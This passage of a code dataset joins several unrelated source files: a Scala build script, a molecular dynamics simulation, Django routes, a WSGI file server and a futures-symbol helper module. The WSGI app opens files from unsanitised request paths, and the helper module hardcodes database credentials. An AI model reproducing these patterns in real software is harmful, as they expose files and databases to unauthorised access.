default=[],\n help=\"\"\"list of resource directories, the contents of\n which are copied into the resulting JAR\"\"\")\n parser.add_argument('--classpath', nargs='*', default=[],\n help=\"\"\"dependency JARs to add to the classpath; those\n sharing the same name as a dependency JAR\n specified by the package manager will take\n priority\"\"\")\n parser.add_argument('--scalacOpts', nargs='*', default=['deprecation', 'feature',\n 'language:reflectiveCalls',\n 'language:implicitConversions',\n 'language:existentials'],\n help=\"\"\"list of arguments to pass to scalac, in addition\n to those specified by dependencies\"\"\")\n parser.add_argument('-o', '--outputJar', default=None,\n help=\"filename and path of output JAR\")\n parser.add_argument('-l', '--link', default=[], action='append',\n help=\"\"\"\"GCC style link against a conda package\"\"\")\n parser.add_argument('--linkJars', type=bool, default=True,\n help=\"\"\"incorporate the contents of dependency JARs into\n the output JAR\"\"\")\n parser.add_argument('--jarEntryPoint', default=None,\n help=\"entrypoint / Main-Class for the JAR\")\n\n args = parser.parse_args(args)\n\n packages = args.link\n packages_plus_depends = resolve_dependencies(packages)\n logging.debug(\"Packages including dependencies: %s\", packages_plus_depends)\n\n package_classpaths = []\n for package in packages_plus_depends:\n package_classpath = list_package_jars(package)\n package_classpaths.extend(package_classpath)\n logging.debug(\"Added classpath for '%s': %s\",\n package, package_classpath)\n\n # Add override classpaths from command line arguments\n classpaths = []\n classpaths_args_basenames = [os.path.basename(classpath)\n for classpath in args.classpath]\n for package_classpath in package_classpaths:\n if os.path.basename(package_classpath) in classpaths_args_basenames:\n logging.info(\"Dropping package classpath %s (overridden by --classpath argument)\", package_classpath)\n else:\n classpaths.append(package_classpath)\n\n classpaths.extend([os.path.abspath(classpath)\n for classpath in args.classpath])\n\n\n # Get all the source files\n source_files = []\n for source_dir in args.sourceDirs:\n for root, _, filenames in os.walk(source_dir):\n for filename in fnmatch.filter(filenames, '*.scala'):\n source_files.append(os.path.join(root, filename))\n logging.info(\"Found %i source files\", len(source_files))\n\n scalac_args = ['scalac']\n 
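    # scalac_args is built up as a plain argv list: the source files, scalac options,\n    # classpath and output flags are appended below, and the finished list is handed\n    # to subprocess.call(scalac_args).\n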
scalac_args.extend(source_files)\n\n scalacopts = args.scalacOpts\n scalacopts = [\"-\" + scalacopt for scalacopt in scalacopts]\n if scalacopts:\n logging.debug(\"Using scalacopts: %s\", scalacopts)\n scalac_args.extend(scalacopts)\n\n if classpaths:\n for classpath in classpaths:\n if not os.path.exists(classpath):\n logging.error(\"Required classpath %s doesn't exist\", classpath)\n # TODO: support Windows OS (uses semicolon for classpath separator)\n classpath_str = ':'.join(classpaths)\n\n logging.debug(\"Using classpath: %s\", classpath_str)\n scalac_args.extend(['-classpath', classpath_str])\n\n if args.outputJar:\n scalac_args.extend(['-d', os.path.abspath(args.outputJar)])\n\n logging.info(\"Running scalac\")\n scalac_returncode = subprocess.call(scalac_args)\n logging.debug(\"scalac done\")\n\n if scalac_returncode != 0:\n logging.error(\"scalac returned nonzero return code: %i\", scalac_returncode)\n sys.exit(1)\n\n # Add resources\n for resource_dir in args.resourceDirs:\n logging.info(\"Copying resources in %s\", resource_dir)\n jar_args = ['jar', 'uf', os.path.abspath(args.outputJar), '-C', resource_dir]\n logging.info(\"Running jar\")\n for root, _, filenames in os.walk(resource_dir):\n for filename in filenames:\n jar_returncode = subprocess.call(jar_args + [filename])\n logging.debug(\"jar done\")\n\n if jar_returncode != 0:\n logging.error(\"jar returned nonzero return code: %i\", jar_returncode)\n sys.exit(1)\n\nif __name__==\"__main__\":\n main()\n","sub_path":"chiselc/chiselc.py","file_name":"chiselc.py","file_ext":"py","file_size_in_byte":8028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"224596802","text":"import numpy as np\nfrom model import parameters as param\nfrom model import Hel,dHel,Hel0,dHel0\nfrom numpy.random import random\nimport math\n\n#===============intializing nuclear positions with Monte-carlo sampling===========\ndef monte_carlo(param, steps = 3000, dR = 0.5):\n R = np.zeros((param.ndof,param.nb))\n ndof, nb = R.shape\n βn = param.beta/nb \n\n #Monte carlo loop\n for i in range(steps):\n rDof = np.random.choice(range(ndof))\n rBead = np.random.choice(range(nb))\n\n # Energy before Move\n En0 = ringPolymer(R[rDof,:], param) + Hel0(R[rDof,rBead]) \n\n # update a bead -------------\n dR0 = dR * (random() - 0.5)\n R[rDof, rBead] += dR0\n #----------------------------\n # Energy after Move\n En1 = ringPolymer(R[rDof,:], param) + Hel0(R[rDof,rBead]) \n\n # Probality of MC\n Pr = np.min([1.0,np.exp(-βn * (En1-En0))])\n # a Random number\n r = random()\n # Accepted\n if r < Pr:\n pass\n # Rejected\n else:\n R[rDof, rBead] -= dR0\n return R\n\n\ndef ringPolymer(R,param):\n \"\"\"\n Compute Ringpolymer Energy\n E = ∑ 0.5 (m nb^2/β^2) (Ri-Ri+1)^2\n \"\"\"\n nb = param.nb\n βn = (param.beta)/nb \n Ω = (1 / βn) \n M = param.M\n E = 0\n for k in range(-1,nb-1):\n E+= 0.5 * M * Ω**2 * (R[k] - R[k+1])**2\n return E\n#==========================================================\n\n\n#=============initializing nuclear momentum================ \ndef initP(param):\n nb, ndof = param.nb , param.ndof\n sigp = (param.M * param.nb/param.beta)**0.5\n return np.random.normal(size = (ndof, nb )) * sigp\n#==========================================================\n\n\n#===========initializing mapping variables==========\ndef initMap(param):\n \"\"\"\n initialize Mapping variables q and p\n dimensionality q[nstate,nb] so do p\n \"\"\"\n q = np.zeros((param.nstate,param.nb))\n p = np.zeros((param.nstate,param.nb))\n i0 = 
param.initState\n for i in range(param.nstate):\n for ib in range(param.nb):\n η = np.sqrt(1 + 2*(i==i0))\n θ = random() * 2 * np.pi\n q[i,ib] = η * np.cos(θ) \n p[i,ib] = η * np.sin(θ) \n return p,q\n#============================================================\n\n#========Calculation of non-adiabatic force term=======\ndef Force(R,q,p,dHij,dH0):\n \"\"\"\n Nuclear Force\n dH => grad of H matrix element\n must NOT include state independent\n part as well\n - 0.5 ∑ dHij (qi * qj + pi * pj - dij) \n \"\"\" \n\n F = np.zeros((R.shape)) # ndof nbead\n\n #----- state independent part-----------\n F[:] = -dH0 \n \n #------- state dependent part------------\n qiqj = np.outer(q,q)\n pipj = np.outer(p,p)\n γ = np.identity(len(q))\n rhoij = 0.5 * ( qiqj + pipj - γ) \n #------ total force term--------------- \n for i in range(len(F)):\n F[i] -= np.sum(rhoij * dHij[:,:,i])\n return F\n#======================================================\n\n#============ normal mode transformation==============\ndef nm_t(P,R,param):\n\n \"\"\"\n normal mode transformation = fourier transform from bead\n representation to mode representation\n\n see Eq(36) and (37) at J. Chem. Phys. 154, 124124 (2021)\n \"\"\" \n\n nb = param.nb\n ndof = param.ndof\n lb_n = param.lb_n\n ub_n = param.ub_n\n \n cmat = np.zeros((nb,nb)) # normal mode transformation matrix\n pibyn = math.acos(-1.0)/nb\n\n\n P_norm = np.zeros((ndof,nb)) #normal modes for momenta\n Q_norm = np.zeros((ndof,nb)) #normal modes for position\n\n for j in range(nb):\n for i in range(nb):\n l=(i-int(nb/2))\n if l==0:\n cmat[j,l] = 1.0\n elif l >= lb_n and l<0:\n cmat[j,l] = np.sqrt(2.0)*np.sin(2.0*pibyn*(j+1)*l)\n elif l > 0 and l <= ub_n:\n cmat[j,l] = np.sqrt(2.0)*np.cos(2.0*pibyn*(j+1)*l)\n\n\n\n pnew = np.zeros((ndof,nb))\n qnew = np.zeros((ndof,nb))\n\n for j in range(nb):\n for i in range(nb):\n l=(i-int(nb/2))\n for m in range(ndof):\n pnew[m,l]+= P[m,j]*cmat[j,l]\n qnew[m,l]+= R[m,j]*cmat[j,l]\n\n\n P_norm = pnew/nb\n Q_norm = qnew/nb\n\n return P_norm, Q_norm\n#==========================================================\n\n#========== back normal mode transformation================\ndef back_nm_t(P_norm,Q_norm,param):\n\n \"\"\"\n back normal mode transformation = fourier transform from mode\n representation to bead representation\n\n see Eq(36) and (37) at J. Chem. Phys. 
154, 124124 (2021)\n \"\"\" \n\n nb = param.nb\n ndof = param.ndof\n lb_n = param.lb_n\n ub_n = param.ub_n\n\n cmat = np.zeros((nb,nb)) # transformation matrices\n pibyn = math.acos(-1.0)/nb\n\n P = np.zeros((ndof,nb)) # bead representation momenta\n R = np.zeros((ndof,nb)) # bead representation position\n\n\n for j in range(nb):\n for i in range(nb):\n l=(i-int(nb/2))\n if l==0:\n cmat[j,l] = 1.0\n elif l >= lb_n and l<0:\n cmat[j,l] = np.sqrt(2.0)*np.sin(2.0*pibyn*(j+1)*l)\n elif l > 0 and l <= ub_n:\n cmat[j,l] = np.sqrt(2.0)*np.cos(2.0*pibyn*(j+1)*l)\n\n pnew = np.zeros((ndof,nb))\n qnew = np.zeros((ndof,nb)) \n\n for j in range(nb):\n for i in range(nb):\n l=(i-int(nb/2))\n for m in range(ndof):\n pnew[m,j]+= P_norm[m,l]*cmat[j,l]\n qnew[m,j]+= Q_norm[m,l]*cmat[j,l]\n\n P = pnew\n R = qnew\n\n return P,R\n#==================================================================\n\n#======== polynomials for free ring-polymer propagation===============\ndef ring(param):\n \n \"\"\"\n see Ceriotti, Parinello JCP 2010 \n \"\"\"\n\n nb = param.nb\n ndof = param.ndof\n dt = param.dtN\n M = param.M\n beta = param.beta\n lb_n = param.lb_n\n ub_n = param.ub_n\n\n poly = np.zeros((4,nb))\n \n #Monodromy matrix for free ring-polymer update\n\n betan = beta/nb\n twown = 2.0/(betan)\n pibyn = math.acos(-1.0)/nb\n\n for i in range(nb):\n l=(i-int(nb/2))\n\n if l==0:\n poly[0,0] = 1.0\n poly[1,0] = 0.0\n poly[2,0] = dt/M\n poly[3,0] = 1.0\n \n elif l >= lb_n and l<0:\n poly[0,l]=np.cos(twown*np.sin(l*pibyn)*dt)\n poly[1,l]=-twown*np.sin(l*pibyn)*M*np.sin(twown*np.sin(l*pibyn)*dt)\n poly[2,l]=np.sin(twown*np.sin(l*pibyn)*dt)/(twown*np.sin(l*pibyn)*M)\n poly[3,l]=np.cos(twown*np.sin(l*pibyn)*dt)\n \n elif l > 0 and l <= ub_n:\n poly[0,l]=np.cos(twown*np.sin(l*pibyn)*dt)\n poly[1,l]=-twown*np.sin(l*pibyn)*M*np.sin(twown*np.sin(l*pibyn)*dt)\n poly[2,l]=np.sin(twown*np.sin(l*pibyn)*dt)/(twown*np.sin(l*pibyn)*M)\n poly[3,l]=np.cos(twown*np.sin(l*pibyn)*dt)\n\n return poly\n\n#==============================================================================\n\n#=========== free ring-polymer propagation ============================\ndef freerp(P,R,param):\n\n \"\"\"\n see Eq. 22 to 24 of Ceriotti, Parinello JCP 2010 \n\n \"\"\"\n nb = param.nb\n ndof = param.ndof\n\n P_norm = np.zeros((ndof,nb)) #normal modes for momenta\n Q_norm = np.zeros((ndof,nb)) #normal modes for position\n poly = np.zeros((4,nb))\n\n poly = ring(param) # calling ring() function to obtain the polynomials\n\n P_norm, Q_norm = nm_t(P,R,param) #normal mode obtained\n\n for k in range(nb):\n for j in range(ndof):\n l=(k-int(nb/2))\n \n pjknew = P_norm[j,l]*poly[0,l] + Q_norm[j,l]*poly[1,l]\n Q_norm[j,l] = P_norm[j,l]*poly[2,l] + Q_norm[j,l]*poly[3,l]\n P_norm[j,l] = pjknew\n\n\n P,R = back_nm_t(P_norm,Q_norm,param) # from normal mode to bead\n\n return P,R\n#=======================================================================\n\n#========== velocity-verlet for mapping oscillators (each bead)========\ndef vvMap(p,q,Hij,dtE):\n \"\"\"\n Hel => function\n q[nstate, nb]\n dqi/dt = dH/dpi = ∑_i Hij pj | dq/dt = Hij @ p\n dpi/dt = - dH/dqi = -∑_i Hij qj | dp/dt = -Hij @ q \n ℒ => ℒp dt/2 . ℒq dt . 
ℒp dt/2\n \"\"\"\n # propagate p half step (dt/2)\n # p(t+dt) = p(t) + dp/dt * dt \n p += (-Hij @ q ) * dtE/2\n\n # propagate q half step\n # q(t+dt) = q(t) + qp/dt * dt \n q += (Hij @ p) * dtE \n\n # propagate p half step (dt/2)\n # p(t+dt) = p(t) + dp/dt * dt \n p += (-Hij @ q ) * dtE/2\n\n return p,q\n#=======================================================================\n\n#============ nonadiabatic velocity-verlet algorithm====================\ndef run_traj(P,R,p,q,param):\n\n \"\"\"\n Velocity Verlet Nonadiabatic\n ℒ => (ℒpx.dt/2) (ℒPR.dt) (ℒpx.dt/2)\n (ℒPR.dt) => (ℒP.dt/2) (ℒR.dt) (ℒP.dt/2)\n\n see Eq.(16) of Ceriotti, Parinello JCP 2010 \n\n \"\"\"\n Hel = param.Hel\n dHel = param.dHel\n dHel0 = param.dHel0\n nb = param.nb \n M = param.M\n dtN,dtE = param.dtN,param.dtE\n EStep = param.EStep\n\n\n #---(ℒpx.dt)---------------\n for ib in range(nb):\n Hij = Hel(R[:,ib])\n # propagate electronic degrees\n for _ in range(EStep):\n p[:,ib], q[:,ib] = vvMap(p[:,ib], q[:,ib], Hij, dtE)\n\n \n #---(ℒPR.dt)-----------------\n #-----(ℒP.dt/2)--------------\n for ib in range(nb):\n dHij = dHel(R[:,ib]) # state-dependent\n dH0 = dHel0(R[:,ib]) # state-independent\n # Obtain Force \n F = Force(R[:,ib], q[:,ib], p[:,ib], dHij, dH0)\n # propagate half-step velocity\n P[:,ib] += F * dtN/2 \n \n # evolution of free ring-polymer\n P,R = freerp(P,R,param) \n \n #-----(ℒP.dt/2)--------------\n for ib in range(nb):\n dHij = dHel(R[:,ib])\n dH0 = dHel0(R[:,ib])\n # Obtain Force \n F = Force(R[:,ib], q[:,ib], p[:,ib], dHij, dH0)\n # propagate half-step velocity\n P[:,ib] += F * dtN/2 \n \n return P,R,p,q\n\n#============ polulation estimator (reduced density matrix)=========\ndef pop(p,q,param):\n nb = param.nb\n nstate = param.nstate\n rho = np.zeros((nstate,nstate))\n \n for ib in range(nb):\n \n rho += 0.5*(np.outer(q[:,ib],q[:,ib])+np.outer(p[:,ib],p[:,ib])-np.identity(len(p[:,ib])))\n \n return rho/nb\n#---------------------------------------------------------------------------\n#----------trajectory loops--------------------\n\nif __name__ == \"__main__\" :\n \n ndof = param.ndof\n nb = param.nb\n NTraj = param.NTraj\n nstate = param.nstate\n NSteps = param.NSteps\n dt=param.dtN\n\n rho_ensemble = np.zeros((nstate,nstate,NSteps))\n\n #f = open(\"R_traj.txt\", \"w+\")\n \n for itraj in range(NTraj):\n\n R = monte_carlo(param) # initialize R\n P = initP(param) # initialize P\n p,q = initMap(param) # initialize p,q\n \n # f.write(f\"{itraj} {' '.join(R[0,0:nb].astype(str))} \\n\")\n\n param.Hel = Hel\n param.dHel = dHel \n param.dHel0 = dHel0 \n\n for isteps in range(NSteps):\n \n P,R,p,q = run_traj(P,R,p,q,param)\n \n #------ calculating population and coherences ------\n rho_ensemble[:,:,isteps] += pop(p,q,param) \n \n\n rho_ensemble = rho_ensemble/NTraj\n \n #f.close() \n\nf = open(\"pop.txt\", \"w+\")\nfor isteps in range(NSteps):\n f.write(f\"{isteps*dt}\\t\")\n for i in range(nstate):\n f.write(f\"{rho_ensemble[i,i,isteps]}\\t\")\n f.write(\"\\n\")\nf.close() \n\n#----------- nonadiabatic Ring-Polymer Molecular Dynamics code-------------------------\n#------------ (calulaion of reduce density matrix)-----------------------------------\n#-------- see [S N. 
Chowdhury and P.Huo, JCP, 121, 3368 (2019)]-------\n\n\n\n\n\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n \n    #q, p = initMap(param) # initialize q, p\n\n    # print(\"q=\",q)\n    # print(\"p=\",p)\n    \n    # rho_final = pop(q,p,param)\n    \n    # print(\"--------------\")\n    # print(rho_final)\n    # print(\"--------------\")\n\n    \n\n\n","sub_path":"rpmd.py","file_name":"rpmd.py","file_ext":"py","file_size_in_byte":12156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"362490601","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom portal\timport views\n\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n\n    url(r'^admin/', include(admin.site.urls)),\n\n    (r'^/?$', views.user_login),\n    (r'^RequestResource/?$', views.resource_request_view),\n    (r'^Results/?$', views.display_results_view),\n    (r'^UsageRequest/?$', views.usage_request_view),\n    (r'^Results/(?P\\w+)/(?P\\d+:\\d+:\\d*)/(?P\\d+:\\d+:\\d*)/?$', views.resource_selected_view),\n    (r'^MyCheckouts/?$', views.get_my_checkouts),\n\n)\n","sub_path":"Schedulize/Schedulize/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"155214052","text":"A = [1, 2, 3, 6, 8, 192]\nnum = int(input(\"Enter a number: \"))\n#a = \"False\"\n#for x in A:\n#    if x == num:\n#        a = \"True\"\n#        print(a)\n#        break\n#    elif x == A[-1] and x != num:\n#        print(a)\ncount = 0\nfor x in A:\n    if x == num:\n        count +=1\n        print(\"True\")\n        break\nif count == 0:\n    print(\"False\")\n    \n\n\n\n\n","sub_path":"arraysearch.py","file_name":"arraysearch.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"165944680","text":"#---------------^_^-------------^_^-------\n# Simulating the double-slit experiment with Python\n# Program reissued on 2019/1/5; the first version was written in December 2017\n# Author: cclplus\n# For learning and exchange purposes only\n# For questions or requests, contact the author at 707101557@qq.com\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport math\nfrom ctypes import *\n#dll = cdll.LoadLibrary('laser.dll');\ndll=WinDLL('laser.dll')\nclass StructPointer(Structure): \n    _fields_ = [(\"arr\", c_double * 2500)] \n    def __init__( self ):\n        for i in range(2500):\n            self.arr[i]=0.0\ndll.laser_mode.restype = POINTER(StructPointer) \nn=c_long(50) # number of points on the square mirror\nn_b=int(50)\nk=c_long(30)\n#ccl=np.ones((n,n),float)\nccl=StructPointer()\n#dll.hello()\nccl=dll.laser_mode(n,k)\nI=np.zeros((n_b,n_b),float)\nfor i in range(n_b):\n    for j in range(n_b):\n        I[i][j]=ccl.contents.arr[i*n_b+j]\nX=range(n_b)\nY=range(n_b)\nfig = plt.figure()\nax = Axes3D(fig)\nax.plot_surface(X,Y,I, rstride=1, cstride=1, cmap='rainbow')\nplt.show()\n","sub_path":"laser.py","file_name":"laser.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"173217837","text":"# Minh Pham\n# CSE 491\n\nimport cgi # for fieldStorage - parsing data\nimport jinja2 # for template\nfrom werkzeug.wrappers import Response # for making wrapper class\nfrom mimetypes import guess_type # for mapping file extension to mimetype\n\n# jinja file path\nJinjaTemplateDir = './templates'\n\n# Other type of resources (.ico, .jpg, ...)\nResDir = './resources'\n\n# A relatively simple WSGI application. 
It's going to print out the\n# environment dictionary after being updated by setup_testing_defaults\ndef simple_app(environ, start_response):\n if environ['PATH_INFO'] == '/file':\n environ['PATH_INFO'] = '/file.txt'\n elif environ['PATH_INFO'] == '/image':\n environ['PATH_INFO'] = '/image.jpg'\n \n if '.' in environ['PATH_INFO'] and '.html' not in environ['PATH_INFO']:\n # request for something other than html page\n ret = handle_resources(environ)\n else:\n # html request\n ret = handle_html(environ)\n\n return ret(environ, start_response)\n\n# return a 404 response\ndef error404():\n jEnv = jinja2.Environment(loader=jinja2.FileSystemLoader(JinjaTemplateDir))\n tmp = jEnv.get_template('notFound.html').render()\n ret = Response(tmp, mimetype ='text/html')\n ret.status = '404 Not Found'\n return ret\n \n# Handle all html page request\ndef handle_html(environ):\n jEnv = jinja2.Environment(loader=jinja2.FileSystemLoader(JinjaTemplateDir))\n\n path = environ['PATH_INFO']\n if path == '/':\n path = '/index'\n if not '.' in path:\n path += '.html'\n\n reqFS = cgi.FieldStorage(fp = environ['wsgi.input'],environ=environ)\n\n try:\n tmp = jEnv.get_template(path).render(reqFS)\n ret = Response(tmp, mimetype ='text/html')\n except jinja2.exceptions.TemplateNotFound:\n return error404()\n\n if path == '/badRequest.html':\n ret.status = '400 Bad Request'\n\n return ret\n\n# Handle resources (.txt, .jpg, .ico,...) request\ndef handle_resources(environ):\n fileDir = ResDir + environ['PATH_INFO']\n try:\n fp = open(fileDir, 'rb')\n except IOError:\n # File not found\n return error404()\n\n data = fp.read()\n fp.close()\n return Response(data, mimetype = guess_type(fileDir)[0])\n\ndef make_app():\n return simple_app\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"351908430","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: ..\\indicatorModule\\pyalgotrade\\commonHelpBylw.py\n# Compiled at: 2020-04-04 05:11:32\n# Size of source mod 2**32: 33271 bytes\n\"\"\"\nCreated on Wed Apr 4 16:12:37 2018\n\n@author: SH\n\"\"\"\nimport pandas as pd, sys\nsys.path.append('E://sihuanlw4SVN//framework')\nimport logging, re, numpy as np\nfrom pyalgotrade import calendayBylw\nFUTURES_CN_Day_STARTTIME_N001 = '21:00:00'\nFUTURES_CN_Day_STARTTIME_N002 = '09:00:00'\nFUTURES_CN_Day_ENDTIME = '15:00:00'\nFUTURES_CN_SYMNAME_MAP_SYMID = {'沪深主连':'CFFEX.IF', \n '上证主连':'CFFEX.IH', \n '中证主连':'CFFEX.IC', \n '债五主连':'CFFEX.TF', \n '债十主连':'CFFEX.T', \n '债二主连':'CFFEX.TS', \n '沪铜主连':'SHFE.CU', \n '沪金主连':'SHFE.AU', \n '沪银主连':'SHFE.AG', \n '沪锌主连':'SHFE.ZN', \n '沪铝主连':'SHFE.AL', \n '橡胶主连':'SHFE.RU', \n '螺纹主连':'SHFE.RB', \n '燃油主连':'SHFE.FU', \n '热卷主连':'SHFE.HC', \n '沥青主连':'SHFE.BU', \n '沪铅主连':'SHFE.PB', \n '沪镍主连':'SHFE.NI', \n '沪锡主连':'SHFE.SN', \n '线材主连':'SHFE.WR', \n '原油主连':'INE.SC', \n '豆一主连':'DCE.A', \n '豆二主连':'DCE.B', \n '玉米主连':'DCE.C', \n '淀粉主连':'DCE.CS', \n '纤板主连':'DCE.FB', \n '铁矿主连':'DCE.I', \n '焦炭主连':'DCE.J', \n '鸡蛋主连':'DCE.JD', \n '焦煤主连':'DCE.JM', \n '塑料主连':'DCE.L', \n '豆粕主连':'DCE.M', \n '棕榈主连':'DCE.P', \n 'PP主连':'DCE.PP', \n 'PVC主连':'DCE.V', \n '豆油主连':'DCE.Y', \n '棉花主连':'CZCE.CF', \n '棉纱主连':'CZCE.CY', \n '白糖主连':'CZCE.SR', \n 'PTA主连':'CZCE.TA', \n '菜油主连':'CZCE.OI', \n '甲醇主连':'CZCE.MA', \n '玻璃主连':'CZCE.FG', \n '菜粕主连':'CZCE.RM', \n '郑煤主连':'CZCE.ZC', \n '粳稻主连':'CZCE.JR', \n 
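# This mapping pairs Chinese futures display names with exchange-qualified\n # symbol IDs (e.g. '沪深主连' -> 'CFFEX.IF'); symNameToSymID() below reads it.\n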
'晚稻主连':'CZCE.LR', \n '硅铁主连':'CZCE.SF', \n '锰硅主连':'CZCE.SM', \n '苹果主连':'CZCE.AP', \n '铁矿':'DCE.I', \n '苹果':'CZCE.AP', \n '甲醇':'CZCE.MA', \n '螺纹':'SHFE.RB', \n '镍':'SHFE.NI', \n '白糖':'CZCE.SR', \n 'PTA':'CZCE.TA', \n '棉花':'CZCE.CF', \n '橡胶':'SHFE.RU', \n '豆油':'DCE.Y', \n '燃料油':'SHFE.FU', \n '原油':'INE.SC', \n 'PP':'DCE.PP', \n 'EG':'DCE.EG', \n '焦炭':'DCE.J', \n '白银':'SHFE.AG', \n '纸浆':'SHFE.SP', \n '沥青':'SHFE.BU', \n '鸡蛋':'DCE.JD', \n '豆粕':'DCE.M', \n '玉米':'DCE.C', \n '动力煤':'CZCE.ZC', \n '锰硅':'CZCE.SM'}\nSTOCKS_CN_SYMNAME_MAP_SYMID = {'300ETF':'SHSE.510300', \n '500ETF':'SHSE.510500', \n '标普500':'SHSE.513500', \n '纳指ETF':'SHSE.513100', \n '创业板50':'SZSE.159949'}\n\ndef splitASymbol(aSymbol):\n atemp = aSymbol.split('.')\n exchange = atemp[0]\n secID = atemp[1]\n secSymbol = ''\n secYear = ''\n secMonth = ''\n secDict = {}\n if exchange == 'CZCE' or exchange == 'SHFE':\n secSymbol = secID[0:2]\n secMonth = secID[-2:]\n elif exchange == 'DCE':\n if secID[0:2] in ('jm', 'jd', 'cs', 'pp'):\n secSymbol = secID[0:2]\n secMonth = secID[-2:]\n elif secID[0:1] in ('a', 'c', 'i', 'j', 'l', 'm', 'p', 'v', 'y'):\n secSymbol = secID[0:1]\n secMonth = secID[-2:]\n else:\n if exchange == 'CFFEX':\n if secID[0:2] in ('IC', 'IH', 'IF', 'TF'):\n secSymbol = secID[0:2]\n secMonth = secID[-2:]\n elif secID[0:1] in ('T', ):\n secSymbol = secID[0:1]\n secMonth = secID[-2:]\n secYear = secID.replace(secSymbol, '').replace(secMonth, '')\n secDict['secSymbol'] = exchange + '.' + secSymbol\n secDict['secYear'] = secYear\n secDict['secMonth'] = secMonth\n import datetime\n strtime = datetime.datetime.now().strftime('%Y-%m-%d')\n if exchange == 'CZCE':\n strNext1Year = str(int(strtime[0:4]) + 1)\n strNext2Year = str(int(strtime[0:4]) + 2)\n if strtime[3] == secYear:\n secDict['secRealYear'] = strtime[2] + secYear\n if strNext1Year[3] == secYear:\n secDict['secRealYear'] = strNext1Year[2] + secYear\n if strNext2Year[3] == secYear:\n secDict['secRealYear'] = strNext2Year[2] + secYear\n else:\n secDict['secRealYear'] = secYear\n return secDict\n\n\ndef juejinSymbol(x):\n if x[0] in ('5', '6'):\n return 'SHSE.' + x\n else:\n return 'SZSE.' + x\n\n\ndef adjustSymbol(aSym):\n if '.' in aSym:\n splitSym = aSym.split('.')\n if 'DCE' in aSym or 'SHFE' in aSym:\n adjustSym = splitSym[0] + '.' + splitSym[1].lower()\n return adjustSym\n if 'CZCE' in aSym or 'CFFEX' in aSym:\n adjustSym = splitSym[0] + '.' + splitSym[1].upper()\n return adjustSym\n if 'SHF' in aSym:\n adjustSym = splitSym[0] + 'E.' + splitSym[1].lower()\n return adjustSym\n if 'CZC' in aSym:\n adjustSym = splitSym[0] + 'E.' + splitSym[1].upper()\n return adjustSym\n\n\ndef reverseExchangeAndSecID(aSymbol):\n splitSym = aSymbol.split('.')\n return splitSym[1] + '.' 
+ splitSym[0]\n\n\ndef adjustExchangeName(oldName):\n if oldName == '郑商所':\n return 'CZCE'\n else:\n if oldName == '大商所':\n return 'DCE'\n else:\n if oldName == '上期所':\n return 'SHFE'\n if oldName == '中金所':\n return 'CFFEX'\n if oldName == '能源中心':\n return 'INE'\n assert 2 == 1, 'strage exchangeName'\n\n\ndef symNameToSymID(symName):\n adict = {}\n adict.update(FUTURES_CN_SYMNAME_MAP_SYMID)\n adict.update(STOCKS_CN_SYMNAME_MAP_SYMID)\n return adict[symName]\n\n\ndef addExchange(aSymbol):\n instruments4CZCE = [\n 'TA', 'SR', 'CF', 'OI', 'MA',\n 'FG', 'RM', 'ZC', 'SF', 'SM', 'AP',\n 'ER', 'RO', 'WS', 'ME', 'WH',\n 'TC', 'WT', 'PM', 'RI', 'LR',\n 'JR', 'CY', 'RS', 'GN']\n instruments4DCE = [\n 'A', 'B', 'C', 'CS', 'I', 'J',\n 'JD', 'JM', 'L', 'M', 'P',\n 'PP', 'V', 'Y', 'FB', 'S',\n 'EG']\n instruments4SHFE = [\n 'AL', 'BU', 'CU', 'SN', 'ZN',\n 'HC', 'NI', 'PB', 'RB', 'RU',\n 'AG', 'AU', 'FU', 'WR']\n instruments4INE = [\n 'SC']\n instruments4CFFEX = [\n 'IC', 'IH', 'IF', 'T', 'TF']\n adjustSym = aSymbol.upper()\n fianSymbol = ''\n if adjustSym[0:2] in instruments4CZCE:\n if len(adjustSym[2:]) == 4:\n fianSymbol = 'CZCE.' + aSymbol[0:2].upper() + adjustSym[3:]\n else:\n fianSymbol = 'CZCE.' + aSymbol.upper()\n else:\n if adjustSym[0:2] in instruments4SHFE:\n fianSymbol = 'SHFE.' + aSymbol.lower()\n else:\n if adjustSym[0:2] in instruments4INE:\n fianSymbol = 'INE.' + aSymbol.lower()\n else:\n if adjustSym[0:2] in instruments4CFFEX:\n fianSymbol = 'CFFEX.' + aSymbol.upper()\n else:\n if adjustSym[0:1] in instruments4CFFEX:\n fianSymbol = 'CFFEX.' + aSymbol.upper()\n else:\n if adjustSym[0:2] in instruments4DCE:\n fianSymbol = 'DCE.' + aSymbol.lower()\n else:\n if adjustSym[0:1] in instruments4DCE:\n fianSymbol = 'DCE.' + aSymbol.lower()\n return fianSymbol\n\n\ndef removeExchange(aSymbol):\n adjSymbol = aSymbol.split('.')\n return adjSymbol[1]\n\n\ndef getOptionContractsBylw(sDateTime, eDateTime):\n engine = create_engine('mysql+pymysql://admin:admin@192.168.10.81:3306/option?charset=utf8', encoding='utf-8')\n optionSymbolsINfo = pd.read_sql('SELECT * FROM optionContractBasicInfo', engine)\n if sDateTime:\n if eDateTime:\n optionSymbolsINfo = optionSymbolsINfo[(~((optionSymbolsINfo['listed_date'] > eDateTime) | (optionSymbolsINfo['expire_date'] < sDateTime)))]\n return list(optionSymbolsINfo['wind_code'].values)\n\n\ndef contracts4wangzong():\n instruments4CZCE = [\n 'CZCE.TA', 'CZCE.SR', 'CZCE.CF', 